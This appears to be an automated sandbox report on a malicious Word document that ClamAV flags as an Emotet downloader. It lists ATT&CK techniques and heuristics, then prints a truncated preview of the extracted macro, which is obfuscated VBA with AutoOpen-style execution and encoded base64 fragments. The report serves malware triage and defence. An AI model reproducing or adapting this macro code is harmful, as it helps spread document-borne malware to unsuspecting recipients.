MALICIOUS (Risk Score: 224)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro. The macro uses CreateObject and an AutoOpen function, indicating that it is designed to execute automatically when the document is opened. Heuristics and ClamAV detection confirm its malicious nature; it most likely acts as a downloader for a second-stage payload. The VBA code is heavily obfuscated, but the presence of AutoOpen and CreateObject strongly suggests an attempt to download and execute further malicious content.
Heuristics (8)
- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44801 bytes | 9116429904e02b1f2d1101d2fac17bb5a1e3a0c2d267e87f091b60b453748568 |

Detection (macros.bas)
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 15 long base64-like blob(s).

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "VmrEAdp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "bKGSuNdRcUfLIP"
Function nYNsBuoMwrjIj()
On Error Resume Next
Select Case XrCsJQ
Case 77040
FGJZuW = Hex(93528 - CSng(62748) - 86605 + ChrW(wwXAo))
pMowf = Vpfjf
End Select
WanXHST = cqCPY("%zu DUAYQAwAGIAZQBkAGQAOQBiAGUAZgA2AGUANgAzMp", 5, 39)
Select Case iaMlWd
Case 9721
udLmuJ = Hex(83569 - CSng(67187) - 39039 + ChrW(aWDmCz))
pOwkUu = rBwSD
End Select
Select Case chRivV
Case 56984
adqMh = Hex(17310 - CSng(59893) - 82193 + ChrW(SBpnY))
uTZjn = ndiChZ
End Select
rXSHztahw = cqCPY("lEAwADEAZABlADYANwBhADgAZQBmAGIAMQA2AGIAMQA3AGEAMwA0ADYANgA0ADMANAAxAGMAZgA0AGMAZQBjADgAYQBmAGQAOQBjAGUAYgBiADAAZgBjADYAZ1PVsu", 3, 119)
Select Case WUzJI
Case 20192
zLuiA = Hex(24707 - CSng(31893) - 12282 + ChrW(XqpEU))
OWmqZ = AHJAjS
End Select
Select Case LQATBm
Case 49401
IoWEV = Hex(53969 - CSng(79582) - 95844 + ChrW(uUZtJ))
LmkUu = QucqnI
End Select
vVKUHTSwRk = cqCPY("DjADEANQBmADgAOQA2AGUAZAAxADkAYQAyAGMAMAA5ADAANwAwAGEAZAAwADAAMgA0C1j.8", 2, 65)
Select Case qCMFz
Case 86743
ztMKB = Hex(43481 - CSng(64887) - 42742 + ChrW(LzsBP))
jRRfUs = uNhTaH
End Select
Select Case EoMWi
Case 97575
irWVU = Hex(54290 - CSng(74976) - 40476 + ChrW(QDSDj))
OfKTtK = iSpaX
End Select
UbKjzbWlzs = cqCPY("huuPkQA1ADYANQBjADUAYwBlADAAZgBjADQANABiADAAMAA4TzP", 6, 42)
Select Case nsEfwz
Case 93302
NGXDa = Hex(96476 - CSng(3605) - 75297 + ChrW(TbiJZj))
LEKdI = juEEh
End Select
Select Case Gpoii
Case 28559
jozNIO = Hex(40008 - CSng(5033) - 64807 + ChrW(hHPinB))
tQnRY = dKBjWd
End Select
AqnINiGiEz = cqCPY("uEEANgA1ADUAYQBmADkAMwBkADkANQBmAGYANwAzADMANQBlADAAOQA2AGUAZgA4AGi7z0U", 3, 64)
Select Case KIlchJ
Case 96034
LvCaJ = Hex(55013 - CSng(16487) - 94616 + ChrW(tTojp))
bPLMU = HiwZF
End Select
Select Case pNEOOu
Case 38376
ZkcQvR = Hex(18272 - CSng(32257) - 91644 + ChrW(COrWI))
qdpJi = XPEbGh
End Select
qQiSA = cqCPY("fcGQANwBmAGQANABmADUAMgBjADAANwA0ADMAYgBmAGEANwBhADQANwA1AGQAYwAwADIAMgAzADkAZAA3AGEANgAwAGUAZQA5ADIAMwA5ADMAMgBlADYAMQA0ADQANQBiADMAZAA0ADIAZQBkAGMANwA5AGG%4o.X", 3, 153)
Select Case uhnskA
Case 92905
bipXYP = Hex(48362 - CSng(65890) - 44395 + ChrW(SEuYlF))
FoMML = LckBh
End Select
Select Case qjBLG
Case 52462
juVFm = Hex(60853 - CSng(11349) - 90836 + ChrW(hGlLIl))
ILJli = IGQzh
End Select
FhpprmO = cqCPY("oUADUAZgA4ADkAZgBhADEAZABiAGYAMwAxADcAMgA5AGUAZABmADIAMwBhADEAZABkADEAMwA0ADYAMwBmAD%nXb", 3, 82)
Select Case QzUiGj
Case 84842
HVLAP = Hex(91201 - CSng(65234) - 53622 + ChrW(dVsEU))
zwqaKm = opwYf
End Select
Select Case kzUuwT
Case 30000
kjJtv = Hex(63677 - CSng(10809) - 42198 + ChrW(kQuqwA))
hoQSo = LawBzo
End Select
LJWYErWz = cqCPY("lAOQAzAGEAZAA1ADYAZgAxAGEAMwA0AGIAZABiAGMAOQAwAGEAMQAwAGMAMAAwADYAYwA3ADYAMgA1ADUAZAA0AGYAZAA5AGUANgBiAGUAYQA0ADMAOABjADUAMABlADMAMwA3AGEANQBkADMnzR9z", 2, 144)
Select Case wRFSV
Case 58400
UMjpu = Hex(91514 - CSng(680) - 9228 + ChrW(SDnww))
IDwiJ = iwuiR
End Select
Select Case znrIzs
Case 71905
ZUdAk = Hex(1168 - CSng(45519) - 97778 + ChrW(noJduY))
hdifCv = CjIlJ
End Select
NSiIZDoDK = cqCPY("GPQAZgBiADYAMAAzADcANQAzADQAYgAwADMANAA1ADAAYwBiADMAMQAzADkAMQAzADUAYQAyADAAZQAzADAAZQBjAD1FPHK", 3, 88)
Select Case HHWhrW
Case 78275
vDNTXw = Hex(6994 - CSng
... (truncated)